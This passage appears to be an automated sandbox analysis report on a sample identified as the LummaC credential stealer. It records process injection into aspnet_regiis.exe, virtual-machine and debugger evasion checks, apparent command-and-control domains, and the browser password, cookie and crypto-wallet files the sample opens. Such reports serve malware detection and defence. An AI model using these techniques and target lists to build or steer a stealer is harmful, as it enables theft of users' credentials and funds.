                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: ForcesLangi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ForcesLangi.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_00757069 push es; retf 2_2_00757074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075C990 push eax; mov dword ptr [esp], 5C5D5E5Fh2_2_0075C99E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0073B324 push F3B90076h; retf 2_2_0073B32A
                Source: ForcesLangi.exeStatic PE information: section name: .text entropy: 7.114943161114869
                Source: C:\Users\user\Desktop\ForcesLangi.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Query firmware table information (likely to detect VMs)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory allocated: FD0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory allocated: 2C10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory allocated: 2A20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exe TID: 4268Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 2132Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE331E0 FindFirstFileExW,0_2_6CE331E0
                Source: C:\Users\user\Desktop\ForcesLangi.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: aspnet_regiis.exe, 00000002.00000003.1736995992.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1866718018.0000000002A32000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1832238529.0000000002A31000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1894217197.0000000002A32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWo9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeAPI call chain: ExitProcess graph end nodegraph_2-14368
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0075E110 LdrInitializeThunk,2_2_0075E110
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE313FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE313FC
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE32D21 mov eax, dword ptr fs:[00000030h]0_2_6CE32D21
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE31AE2 mov eax, dword ptr fs:[00000030h]0_2_6CE31AE2
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2E9E7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CE2E9E7
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE313FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE313FC
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2EF12 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CE2EF12
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000 protect: page execute and read and writeJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000 value starts with: 4D5AJump to behavior
                LummaC encrypted strings found
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: hummskitnj.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: cashfuzysao.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: appliacnesot.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: screwamusresz.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: inherineau.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: scentniej.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: rebuildeso.buzz
                Source: ForcesLangi.exe, 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: prisonyfork.buzz
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 720000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 721000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 762000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 765000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 773000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 721000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 762000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 765000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 773000Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 580008Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2F0D8 cpuid 0_2_6CE2F0D8
                Source: C:\Users\user\Desktop\ForcesLangi.exeQueries volume information: C:\Users\user\Desktop\ForcesLangi.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ForcesLangi.exeCode function: 0_2_6CE2EB5B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CE2EB5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.00000000029FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4820, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.binstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: aspnet_regiis.exeString found in binary or memory: Jaxx Liberty
                Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                Source: aspnet_regiis.exe, 00000002.00000003.1831852813.0000000002A2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                Source: aspnet_regiis.exe, 00000002.00000002.1893702239.0000000002A2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: aspnet_regiis.exe, 00000002.00000003.1831814063.0000000002A74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
